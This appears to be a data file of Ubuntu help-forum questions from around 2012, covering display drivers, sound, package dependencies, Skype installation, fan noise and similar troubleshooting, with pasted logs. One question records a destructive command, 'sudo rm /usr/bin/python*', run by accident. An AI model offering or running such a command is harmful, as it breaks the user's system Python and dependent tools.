218871	xorg does not see my monitor edid	below is the output from my xorg.0 . x.org x server 1.11.3 release date : 2011-12-16 [ 22.311 ] x protocol version 11 , revision 0 [ 22.311 ] build operating system : linux 2.6.42-23-generic x86_64 ubuntu [ 22.311 ] current operating system : linux sean-p55-usb3 3.2.0-34-generic # 53-ubuntu smp thu nov 15 10:48:16 utc 2012 x86_64 [ 22.311 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-34-generic root=uuid=0a34603e-aee9-44d1-8982-a5a5a38c3e4d ro quiet splash [ 22.311 ] build date : 29 august 2012 12:12:33am [ 22.311 ] xorg-server 2:1.11.4-0ubuntu10.8 ( for technical support please see http : //www.ubuntu.com/support ) [ 22.311 ] current version of pixman : 0.24.4 [ 22.311 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 22.311 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 22.311 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat nov 17 13:20:45 2012 [ 22.311 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 22.311 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 22.311 ] ( == ) no layout section . using the first screen section . [ 22.311 ] ( == ) no screen section available . using defaults . [ 22.311 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 22.311 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 22.311 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 22.311 ] ( ** ) | | -- > device `` default device '' [ 22.311 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 22.311 ] ( == ) automatically adding devices i have searched all over , and followed lots of dead ends and unanswered questions on this issue . i need to get this monitor recognised so i can use the native resolution of 1600x1200 . the nvidia driver in windows has no problem with this . the monitor is an old iiyama hm204dt a . is there a way of configuring xorg manually to get these working ? i have tried xrandr but this will not work . output : - sean @ sean-p55-usb3 : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1152 x 864 , maximum 16384 x 16384 dvi-i-0 connected 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-2 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 disconnected ( normal left inverted right x axis y axis ) tried nvidia xorg.config : sean @ sean-p55-usb3 : ~ $ sudo nvidia-xconfig [ sudo ] password for sean : using x configuration file : `` /etc/x11/xorg.conf '' . validation error : data incomplete in file /etc/x11/xorg.conf . device section `` default device '' must have a driver line . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.nvidia-xconfig-original' backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' how do i insert a driver line ? this is a bit of a pain as i want to use my vectorworks cad program in a winxp vbox at 1600x1200 but all virtual drives are restricted to the host screen resolution . do i need to manually create eidi info in xorg ? i am slightly confused about how xorg and nvidia relate please help
218873	12.10 restore default theme	i 've been playing with different themes on my fresh 12.10 and it seems that i deleted default , if you can call it that , theme files from .themes . now it does n't show some icons like terminal 's and gedit 's . is there a way to completely restore it ? are there any packages to install ?
218877	i cant see my windows drive in ubuntu	i 'm n00ber than any n00b you ever seen , so bear with me ... i just downloaded wubi and installed ubuntu 12.10 along with windows 7 on the same hdd . linux works fine , but doesnt show files from drive c ( on which it is installed ) . i really need c as it contains all my files . i did df -h in the terminal . it does show the drive . /dev/sda2 577g 220g 358g 38 % /host now i tried to mount the drive sudo mount /dev/sda2 and got the response mount : /dev/sda2 already mounted or /host busy mount : according to mtab , /dev/sda2 is already mounted on /host i dont know what that means . the drive doesnt show up in home folder . what am i supposed to do now ?
218881	recording with audacity and streaming on ustream simultaneously	my church currently records services using audacity . we use ubuntu 12.04 . as well as recording on audacity , we also want to stream live on ustream.tv . however , when i tried this , i found that we could either record with audacity or stream on ustream.tv , but not both simultaneously . i would expect that this will be possible , but i have no idea how to actually do this . please note that i 'm the main person responsible for maintaining this system , but i do n't actually use ubuntu aside from this pc . so i have very little knowledge about ubuntu .
218895	error while trying to play .mp4 file	after agree to download and install extra multimedia plugins , it says package dependency can not be resolved , with below error : the following packages have unmet dependencies : gstreamer0.10-plugins-bad : i386 : depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu20 is to be installed depends : libcairo2 ( > = 1.2.4 ) but 1.12.3+git20120608.f228769d-0ubuntu0ricotz~quantal0 is to be installed depends : libcdaudio1 ( > = 0.99.12p2 ) but 0.99.12p2-12 is to be installed depends : libcurl3-gnutls ( > = 7.16.2 ) but 7.27.0-1ubuntu1 is to be installed depends : libdvdnav4 ( > = 4.2.0+20120524 ) but 4.2.0+20120524-2 is to be installed depends : libfaad2 ( > = 2.7 ) but 2.7-8 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.34.0-1ubuntu1 is to be installed depends : libgsm1 ( > = 1.0.13 ) but 1.0.13-4 is to be installed depends : libgstreamer-plugins-bad0.10-0 ( = 0.10.23-7ubuntu1 ) but 0.10.23-7ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.36 ) but 0.10.36-1ubuntu1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.36 ) but 0.10.36-1ubuntu2 is to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but 2:0.1~r459-1ubuntu1 is to be installed depends : libopenal1 ( > = 1:1.13 ) but 1:1.14-4ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-2 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.49-1ubuntu1 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.36.3-0ubuntu1 is to be installed depends : librtmp0 ( > = 2.3 ) but 2.4+20111222.git4e06e21-1 is to be installed depends : libschroedinger-1.0-0 ( > = 1.0.9 ) but 1.0.11-2 is to be installed depends : libsndfile1 ( > = 1.0.20 ) but 1.0.25-5 is to be installed depends : libssl1.0.0 ( > = 1.0.0 ) but 1.0.1c-3ubuntu2 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.7.2-2ubuntu1 is to be installed depends : libvpx1 ( > = 1.0.0 ) but 1.1.0-1 is to be installed depends : libxvidcore4 ( > = 1.2.2 ) but 2:1.3.2-9 is to be installed
218901	long boot time problem	my computer boot time is about 125s . this is the bootchart image : bootchart is there something wrong with the boot process ? what should i do to reduce boot time ? thanks in advance !
218902	sound is not working correctly on ubuntu 12.04	i know this is my own fault . but what i did was this first i wrote this command 'sudo apt-get remove pulseaudio ' and then i wrote again 'sudo apt-get install pulseaudio ' and now the sound does n't work properly and the indicator does n't work either , it 's just grayed out . the shortcuts are not working either . alsamixer is working , and this is the only way i change change the volume at the moment : jeggy @ jeggy-xps : ~ $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf1c00000 irq 52 jeggy @ jeggy-xps : ~ $ aplay -l **** list of playback hardware devices **** alsa lib conf.c:1686 : ( snd_config_load1 ) _toplevel_:11:0 : unexpected end of file alsa lib conf.c:3406 : ( config_file_open ) /etc/asound.conf may be old or corrupted : consider to remove or fix it /usr/bin/pulseaudio : error while loading shared libraries : libpulsecommon-1.1.so : can not open shared object file : no such file or directory card 0 : pch [ hda intel pch ] , device 0 : alc665 analog [ alc665 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc665 digital [ alc665 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 vlc sound is not working , am getting this error :
218903	is there a way to install skype 4.1 on ubuntu 11.04 64bit ?	i been trying to install skype 4.1 on my ubuntu 11.04 but i have failed , when installing the 32bit package `` skype-ubuntu-lucid_4.1.0.20-1_i386.deb '' with this command `` sudo dpkg -i -- force-architecture skype-ubuntu-lucid_4.1.0.20-1_i386.deb '' skype_4.1.0.20-1~raring2_amd64.deb skype-ubuntu-lucid_4.1.0.20-1_i386.deb wanas @ wanas-satellite-a500 : ~/downloads $ sudo dpkg -i -- force-architecture skype- ubuntu-lucid_4.1.0.20-1_i386.deb dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) ( reading database ... 178215 files and directories currently installed . ) preparing to replace skype : i386 4.1.0.20-1 ( using skype-ubuntu-lucid_4.1.0.20- 1_i386.deb ) ... unpacking replacement skype : i386 ... dpkg : dependency problems prevent configuration of skype : i386 : skype : i386 depends on libasound2 ( > > 1.0.22 ) . skype : i386 depends on libc6 ( > = 2.3.6-6~ ) . skype : i386 depends on libc6 ( > = 2.7 ) . skype : i386 depends on libgcc1 ( > = 1:4.1.1 ) . skype : i386 depends on libqt4-dbus ( > = 4:4.5.3 ) . skype : i386 depends on libqt4-network ( > = 4:4.5.3 ) . skype : i386 depends on libqt4-webkit ( > = 4:4.5.3 ) . skype : i386 depends on libqt4-xml ( > = 4:4.5.3 ) . skype : i386 depends on libqtcore4 ( > = 4:4.6.1 ) . skype : i386 depends on libqtgui4 ( > = 4:4.6.1 ) . skype : i386 depends on libstdc++6 ( > = 4.4.0 ) . skype : i386 depends on libx11-6 ( > = 0 ) . skype : i386 depends on libxext6 ( > = 0 ) . skype : i386 depends on libxss1 . skype : i386 depends on libxv1 . dpkg : error processing skype : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for python-support ... errors were encountered while processing : skype : i386 and when i ignore that and try to open skype through terminal i got this : wanas @ wanas-satellite-a500 : ~/downloads $ skype skype : error while loading shared libraries : libphonon.so.4 : wrong elf class : elfclass64 i there a way to get it to work , i know that ubuntu 11.04 its support ended last month , and there is no way to get it though the repository . is there any working ppa works with my distro ? ? thanks in advance
218904	usb modem dos n't working in ubuntu	in ubuntu 12.10 usb-modem huawei 171 from mts is not connected to the network . first on the message are you registered on the network , immediately after that , you are disconnected from the network . this happened after there was an internal error notification ubuntu . i did not pay attention , and closed by sending the report . after the reboot does not work . settings are not changed . i am online with this modem in windows 8 . could you tell me why it is not working , please .
218911	nautilus tags/labels/marks/columns for folders/files	is there any way how to mark folders or files with tags ( or labels , new columns or whatever ) in nautilus ? it would be nice to sort marked folders or files through this tags . especially my first idea was to mark folders in my movie directory with tags seen , not seen , must see , and so on . then i realized it would be useful in any other workspaces with any custom tags ... is there any nautilus extension for this ? or any other file manager which can do this ? it might look like this :
218919	i accidentally deleted /usr/bin/python . how do i restore it ?	trying to set the default python version to 2.7 , i ran this command : sudo rm /usr/bin/python* now when i type python or python2.7 , i see these error messages : bash : /usr/bin/python : no such file or directory bash : /usr/bin/python2.7 : no such file or directory what happened ? should i have run the rm command ? how can i undo it ?
218925	i want to learn how to help or contribute to unity	i am a college student studying computer science and would one day like to work on operating systems . the part of ubuntu that really interests me is unity and i would like to study it and possibly contribute to it . i was reading the wiki pages about it and it was saying to get a copy of all the required components and then start hacking . would it be wise to do this in a virtual machine with ubuntu on it ? do you have any advice on a good place to start ? do you know of any common pitfalls ? should i also post in the irc for this ? thanks
218930	how can i create a `` built-in '' color scheme for gnome terminal ?	gnome terminal has a few built-in color schemes : how can i add more to this list ?
218932	convert youtube to mp3	is there any app like the one from dvdvideosoft but for linux to download and convert videos to mp3 ? without the need to download them first . if it is not what app should i use without the terminal ? i have 12.10 .
218933	fan running continously on hp pavillion g6 notebook with 12.04.1 lts , help please ?	fan is running continously on my hp pavillion g6 notebook with 12.04.1 lts . my system specifications are : - ram : 6gb graphics card : - 1 gb ( amd raedon 64xx ) . hdd : 540 gb . please find a list of acpi errors logs from dmesg as follows : - buffer @ ankit : ~ $ dmesg | grep acpi -i [ 0.000000 ] bios-e820 : 000000009cebf000 - 000000009cfbf000 ( acpi nvs ) [ 0.000000 ] bios-e820 : 000000009cfbf000 - 000000009cfff000 ( acpi data ) [ 0.000000 ] acpi : rsdp 00000000000fe020 00024 ( v02 hpqoem ) [ 0.000000 ] acpi : xsdt 000000009cffe120 00084 ( v01 hpqoem slic-mpc 00000001 01000013 ) [ 0.000000 ] acpi : facp 000000009cffc000 000f4 ( v04 hpqoem slic-mpc 00000001 msft 01000013 ) [ 0.000000 ] acpi : dsdt 000000009cfec000 0c132 ( v01 hp 1670 00000000 msft 01000013 ) [ 0.000000 ] acpi : facs 000000009cf6c000 00040 [ 0.000000 ] acpi : asf ! 000000009cffd000 000a5 ( v32 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : hpet 000000009cffb000 00038 ( v01 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : apic 000000009cffa000 0008c ( v02 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : mcfg 000000009cff9000 0003c ( v01 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : slic 000000009cfeb000 00176 ( v01 hpqoem slic-mpc 00000001 msft 01000013 ) [ 0.000000 ] acpi : ssdt 000000009cfea000 00d52 ( v01 hp 1670 00001000 msft 01000013 ) [ 0.000000 ] acpi : boot 000000009cfe8000 00028 ( v01 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : aspt 000000009cfe5000 00034 ( v07 hp 1670 00000001 msft 01000013 ) [ 0.000000 ] acpi : ssdt 000000009cfe4000 00780 ( v01 hp 1670 00003000 intl 20100121 ) [ 0.000000 ] acpi : ssdt 000000009cfe3000 00996 ( v01 hp 1670 00003000 intl 20100121 ) [ 0.000000 ] acpi : ssdt 000000009cfdd000 0219f ( v01 hp 1670 00001000 intl 20100121 ) [ 0.000000 ] acpi : local apic address 0xfee00000 [ 0.000000 ] acpi : pm-timer io port : 0x408 [ 0.000000 ] acpi : local apic address 0xfee00000 [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x00 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x02 ] lapic_id [ 0x01 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x03 ] lapic_id [ 0x02 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x04 ] lapic_id [ 0x03 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x05 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x06 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x07 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x08 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : ioapic ( id [ 0x00 ] address [ 0xfec00000 ] gsi_base [ 0 ] ) [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 0 global_irq 2 dfl dfl ) [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 9 global_irq 9 high level ) [ 0.000000 ] acpi : irq0 used by override . [ 0.000000 ] acpi : irq2 used by override . [ 0.000000 ] acpi : irq9 used by override . [ 0.000000 ] using acpi ( madt ) for smp configuration information [ 0.000000 ] acpi : hpet id : 0x8086a201 base : 0xfed00000 [ 0.005902 ] acpi : core revision 20110623 [ 0.536006 ] pm : registering acpi nvs region at 9cebf000 ( 1048576 bytes ) [ 0.538423 ] acpi fadt declares the system does n't support pcie aspm , so disable it [ 0.538429 ] acpi : bus type pci registered [ 0.656088 ] acpi : added _osi ( module device ) [ 0.656094 ] acpi : added _osi ( processor device ) [ 0.656098 ] acpi : added _osi ( 3.0 _scp extensions ) [ 0.656103 ] acpi : added _osi ( processor aggregator device ) [ 0.660335 ] acpi : ec : look up ec in dsdt [ 0.664416 ] acpi : executed 1 blocks of module-level executable aml code [ 0.728303 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 0.729536 ] acpi : ssdt 000000009ce70798 00727 ( v01 pmref cpu0cst 00003001 intl 20100121 ) [ 0.730622 ] acpi : dynamic oem table load : [ 0.730630 ] acpi : ssdt ( null ) 00727 ( v01 pmref cpu0cst 00003001 intl 20100121 ) [ 0.760829 ] acpi : ssdt 000000009ce71a98 00303 ( v01 pmref apist 00003000 intl 20100121 ) [ 0.761992 ] acpi : dynamic oem table load : [ 0.761998 ] acpi : ssdt ( null ) 00303 ( v01 pmref apist 00003000 intl 20100121 ) [ 0.792451 ] acpi : ssdt 000000009ce6fd98 00119 ( v01 pmref apcst 00003000 intl 20100121 ) [ 0.793521 ] acpi : dynamic oem table load : [ 0.793528 ] acpi : ssdt ( null ) 00119 ( v01 pmref apcst 00003000 intl 20100121 ) [ 0.872981 ] acpi : interpreter enabled [ 0.872992 ] acpi : ( supports s0 s3 s4 s5 ) [ 0.873064 ] acpi : using ioapic for interrupt routing [ 0.882723 ] acpi : ec : gpe = 0x16 , i/o : command/status = 0x66 , data = 0x62 [ 0.883072 ] acpi : no dock devices found . [ 0.883084 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and report a bug [ 0.883882 ] acpi : pci root bridge [ pci0 ] ( domain 0000 [ bus 00-fe ] ) [ 0.924187 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] [ 0.924509 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp01._prt ] [ 0.924581 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp02._prt ] [ 0.924659 ] acpi : pci interrupt routing table [ \_sb_.pci0.rp03._prt ] [ 0.924758 ] acpi : pci interrupt routing table [ \_sb_.pci0.peg0._prt ] [ 0.924973 ] pci0000:00 : requesting acpi _osc control ( 0x1d ) [ 0.925064 ] pci0000:00 : acpi _osc request failed ( ae_error ) , returned control mask : 0x1d [ 0.925069 ] acpi _osc control for pcie not granted , disabling aspm [ 0.930212 ] acpi : pci interrupt link [ lnka ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) [ 0.930327 ] acpi : pci interrupt link [ lnkb ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) [ 0.930436 ] acpi : pci interrupt link [ lnkc ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) [ 0.930547 ] acpi : pci interrupt link [ lnkd ] ( irqs 1 3 4 5 6 *10 11 12 14 15 ) [ 0.930655 ] acpi : pci interrupt link [ lnke ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *0 , disabled . [ 0.930764 ] acpi : pci interrupt link [ lnkf ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *0 , disabled . [ 0.930873 ] acpi : pci interrupt link [ lnkg ] ( irqs 1 3 4 5 6 10 *11 12 14 15 ) [ 0.930979 ] acpi : pci interrupt link [ lnkh ] ( irqs 1 3 4 5 6 10 11 12 14 15 ) *0 , disabled . [ 0.932142 ] pci : using acpi for irq routing [ 0.967119 ] pnp : pnp acpi init [ 0.967151 ] acpi : bus type pnp registered [ 0.968356 ] pnp 00:00 : plug and play acpi device , ids pnp0a08 pnp0a03 ( active ) [ 0.968516 ] pnp 00:01 : plug and play acpi device , ids pnp0200 ( active ) [ 0.968586 ] pnp 00:02 : plug and play acpi device , ids int0800 ( active ) [ 0.968818 ] pnp 00:03 : plug and play acpi device , ids pnp0103 ( active ) [ 0.968915 ] pnp 00:04 : plug and play acpi device , ids pnp0c04 ( active ) [ 0.969206 ] system 00:05 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.969293 ] pnp 00:06 : plug and play acpi device , ids pnp0b00 ( active ) [ 0.969418 ] pnp 00:07 : plug and play acpi device , ids pnp0303 ( active ) [ 0.969528 ] pnp 00:08 : plug and play acpi device , ids syn1e3f syn1e00 syn0002 pnp0f13 ( active ) [ 0.969969 ] system 00:09 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.970574 ] system 00:0a : plug and play acpi device , ids pnp0c01 ( active ) [ 0.970617 ] pnp : pnp acpi : found 11 devices [ 0.970622 ] acpi : acpi bus type pnp unregistered [ 1.138064 ] acpi : deprecated procfs i/f for ac is loaded , please retry with config_acpi_procfs_power cleared [ 1.138331 ] acpi : ac adapter [ acad ] ( off-line ) [ 1.139068 ] acpi : lid switch [ lid0 ] [ 1.139176 ] acpi : power button [ pwrb ] [ 1.139286 ] acpi : power button [ pwrf ] [ 1.144637 ] acpi : thermal zone [ tz01 ] ( 0 c ) [ 1.144677 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 1.144693 ] acpi : battery slot [ bat0 ] ( battery present ) [ 1.206926 ] acpi : battery slot [ bat0 ] ( battery present ) [ 13.176993 ] acpi device:1a : registered as cooling_device4 [ 13.179931 ] acpi device:1b : registered as cooling_device5 [ 13.180221 ] acpi : video device [ vga ] ( multi-head : yes rom : no post : no ) [ 13.219589 ] acpi device:20 : registered as cooling_device6 [ 13.220851 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 1649.915134 ] i8042 aux 00:08 : wake-up capability disabled by acpi [ 1649.915147 ] i8042 kbd 00:07 : wake-up capability enabled by acpi [ 1650.931028 ] r8169 0000:03:00.0 : wake-up capability enabled by acpi [ 1650.954743 ] ehci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi [ 1650.978733 ] ehci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi [ 1651.010950 ] acpi : preparing to enter system sleep state s3 [ 1652.251505 ] acpi : low-level resume complete [ 1652.360953 ] acpi : waking up from system sleep state s3 [ 1652.427581 ] ehci_hcd 0000:00:1a.0 : wake-up capability disabled by acpi [ 1652.435579 ] ehci_hcd 0000:00:1d.0 : wake-up capability disabled by acpi [ 1652.437887 ] r8169 0000:03:00.0 : wake-up capability disabled by acpi [ 1652.506660 ] i8042 kbd 00:07 : wake-up capability disabled by acpi [ 1661.238234 ] acpi error : no handler for region [ cms0 ] ( ffff8801d5035558 ) [ systemcmos ] ( 20110623/evregion-373 ) [ 1661.238253 ] acpi error : region systemcmos ( id=5 ) has no handler ( 20110623/exfldio-292 ) [ 1661.238268 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q33 ] ( node ffff8801d5054de8 ) , ae_not_exist ( 20110623/psparse-536 ) [ 3151.784288 ] i8042 aux 00:08 : wake-up capability disabled by acpi [ 3151.784301 ] i8042 kbd 00:07 : wake-up capability enabled by acpi [ 3152.797676 ] r8169 0000:03:00.0 : wake-up capability enabled by acpi [ 3152.821379 ] ehci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi [ 3152.845367 ] ehci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi [ 3152.877600 ] acpi : preparing to enter system sleep state s3 [ 3154.313213 ] acpi : low-level resume complete [ 3154.422297 ] acpi : waking up from system sleep state s3 [ 3154.489692 ] ehci_hcd 0000:00:1a.0 : wake-up capability disabled by acpi [ 3154.497667 ] ehci_hcd 0000:00:1d.0 : wake-up capability disabled by acpi [ 3154.505947 ] r8169 0000:03:00.0 : wake-up capability disabled by acpi [ 3154.568985 ] i8042 kbd 00:07 : wake-up capability disabled by acpi [ 3162.745149 ] acpi error : no handler for region [ cms0 ] ( ffff8801d5035558 ) [ systemcmos ] ( 20110623/evregion-373 ) [ 3162.745168 ] acpi error : region systemcmos ( id=5 ) has no handler ( 20110623/exfldio-292 ) [ 3162.745183 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q33 ] ( node ffff8801d5054de8 ) , ae_not_exist ( 20110623/psparse-536 ) [ 6775.723501 ] acpi error : no handler for region [ cms0 ] ( ffff8801d5035558 ) [ systemcmos ] ( 20110623/evregion-373 ) [ 6775.723519 ] acpi error : region systemcmos ( id=5 ) has no handler ( 20110623/exfldio-292 ) [ 6775.723535 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q33 ] ( node ffff8801d5054de8 ) , ae_not_exist ( 20110623/psparse-536 ) [ 10388.004760 ] acpi error : no handler for region [ cms0 ] ( ffff8801d5035558 ) [ systemcmos ] ( 20110623/evregion-373 ) [ 10388.004778 ] acpi error : region systemcmos ( id=5 ) has no handler ( 20110623/exfldio-292 ) [ 10388.004801 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q33 ] ( node ffff8801d5054de8 ) , ae_not_exist ( 20110623/psparse-536 ) [ 10723.591930 ] i8042 aux 00:08 : wake-up capability disabled by acpi [ 10723.591942 ] i8042 kbd 00:07 : wake-up capability enabled by acpi [ 10724.607624 ] r8169 0000:03:00.0 : wake-up capability enabled by acpi [ 10724.631349 ] ehci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi [ 10724.655339 ] ehci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi [ 10724.687572 ] acpi : preparing to enter system sleep state s3 [ 10726.123176 ] acpi : low-level resume complete [ 10726.232181 ] acpi : waking up from system sleep state s3 [ 10726.303653 ] ehci_hcd 0000:00:1a.0 : wake-up capability disabled by acpi [ 10726.311648 ] ehci_hcd 0000:00:1d.0 : wake-up capability disabled by acpi [ 10726.315734 ] r8169 0000:03:00.0 : wake-up capability disabled by acpi [ 10726.379287 ] i8042 kbd 00:07 : wake-up capability disabled by acpi [ 10734.393523 ] acpi error : no handler for region [ cms0 ] ( ffff8801d5035558 ) [ systemcmos ] ( 20110623/evregion-373 ) [ 10734.393542 ] acpi error : region systemcmos ( id=5 ) has no handler ( 20110623/exfldio-292 ) [ 10734.393557 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q33 ] ( node ffff8801d5054de8 ) , ae_not_exist ( 20110623/ps continuous sound from the fan is very annoying , any help would highly appreciated .
218934	intel hd graphics : games only show part of the screen	so here is my issue : i am running ubuntu 12.10 32bit with an intel i5 card and integrated ironlake graphics ( i think thats intel hd 4000 although i 'm not entirely sure ) . the funny thing is that i have a few native linux games , such as humble bundle 2 and 4 , and seperate copies of amnesia etc . what 's odd is that some of these games will show about a 3rd of the screen whilst others display normally . sounds strange i know but for instance , if i play 0ad , i get the full screen experience with no issues whatsoever . however , amnesia is a different story altogether , since there it seems as if the game is expecting my monitor to be much larger than it is and i see about a third of the top and a third of the left making the game unplayable . unfortunately , amnesia is not the only one . one or two of the humble bundle games experience the same trouble . it 's gotten to a point where it 's a hit-and-miss on whether a game works fine or not . does anyone have any advice ? and on a slightly related question , my fn buttons do n't work for brightness and gamma etc , anyone know how to get them to work ? ( since that 's not my original question it 's not too important ) . thanks arthur
218941	how to script two informations with one command ?	i 'm trying to get more than one information in commandline with iwlist commannd to get 'for example ' mac address and essid . i tried with # iwlist wlan0 scan|egrep 'address|essid' but i dont want all the lines but only the result 'for example' # 00:13:33:83:36 : f7 # essid name there is any way to get that ? thanks .
218942	replacing xscreensaver with gnome-screensaver , problems ( xubuntu )	i found this helpful question replace xscreensaver with gnome-screensaver ( xubuntu ) but the executable gnome-screensaver-preferences ca n't be found . so i 'm not sure what to do , to get gnome-screensaver working correctly . how do i configure it if that program is n't there ?
218945	12.10 video card driver : < empty > experience : limited	system details/ video card/driver is empty and experience shows `` restreint '' which means limited in french . my video card is : intel gma 4500mhd , lscpi shows driver=i915 latency=0 . i can only use gnome ( no effects ) and i would like to use gnome3 again ( as i did with ubuntu 12.04 ) . thanks xorg.conf is empty , and i would provide xorg.0.log but i do n't know how to attach it to this post . note : a 12.10 live usb works flawlessly on my machine . but i can not reinstall everything . please help ! ! !
218946	resizing my ubuntu ext4 partition	i want to resize my ubuntu sda5 partition ( basically merge it with the unallocated 87 gb space ) . but the resize/move option for sda5 is not working / enabled in gparted . appreciate response in lay man terms .
218952	how to assign ctrl+alt+del to the gnome shell shutdown dialog ?	my question looks an awful lot like this one : how can i assign ctrl+alt+delete to shutdown dialog ? the difference is that i am using gnome shell instead of unity and i would like the gnome shell version of this window .
218953	can i control brightness on second monitor ?	i have a thinkpad ( x301 ) with an external monitor connected via a displayport to hdmi cable . i can control the brightness of the laptop monitor using the keys on the laptop , but i ca n't work out how to control the brightness of the external monitor . $ ls /sys/class/backlight/*/brightness /sys/class/backlight/acpi_video0/brightness /sys/class/backlight/intel_backlight/brightness $ cat /sys/class/backlight/acpi_video0/brightness 11 $ cat /sys/class/backlight/acpi_video0/max_brightness 15 $ cat /sys/class/backlight/intel_backlight/brightness 501804 $ cat /sys/class/backlight/intel_backlight/max_brightness 2414340 i can write values into the above and both intel_backlight and acpi_video0 changes the brightness of the laptop monitor . does the above mean that there is no way to change the brightness of the external monitor ( other than the osd ) ?
218954	what sata version does my mainboard have , i or ii ?	this seems trivial but neither information about sata , ide ( pata ) controllers lspci , lshw , nor gnome-disk-utility can tell me if the sata ports on my mainboard are sata i , ii or even iii . output of sudo lshw -html > hardwareprofile.html is http : //pastebin.com/mbxeebel i want to buy a new hard drive .
